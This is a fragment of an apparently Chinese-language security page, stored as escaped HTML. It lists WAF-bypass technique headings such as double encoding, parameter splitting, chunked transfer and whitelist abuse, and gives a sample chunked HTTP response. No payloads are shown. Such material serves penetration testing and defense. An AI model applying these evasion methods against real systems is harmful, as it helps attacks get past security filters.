\u7b49\u53f7\u7ed5\u8fc7<\/h2>\n
\u53cc\u5173\u952e\u8bcd\u7ed5\u8fc7<\/h2>\n
\u4e8c\u6b21\u7f16\u7801\u7ed5\u8fc7<\/h2>\n
\u591a\u53c2\u6570\u62c6\u5206\u7ed5\u8fc7<\/h2>\n
\u751f\u50fb\u51fd\u6570\u7ed5\u8fc7<\/h2>\n
\u5206\u5757\u4f20\u8f93\u7ed5\u8fc7<\/h2>\n
HTTP\/1.1 200 OK\nContent-Type: text\/plain\nTransfer-Encoding: chunked\n23rn\nThis is the data in the first chunkrn\n1Arn\nand this is the second onern\n3rn\nconrn\n8rn\nsequencern\n0rn\nrn<\/code><\/pre>\n![\"1745993466350-97877f22-bfe9-46d2-a26e-c6a94d1e7d57.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae66523505.png\")
<\/p>\n![\"1745993491864-a1cd360b-fc9e-4854-95c6-c512c02f3474.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae668c7bcd.png\")
<\/p>\n\u4fe1\u4efb\u767d\u540d\u5355\u7ed5\u8fc7<\/h2>\n
![\"1745993670811-9d71aeb7-1416-40f1-9e04-38f9a91e3305.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae66bbf7ca.png\")
<\/p>\n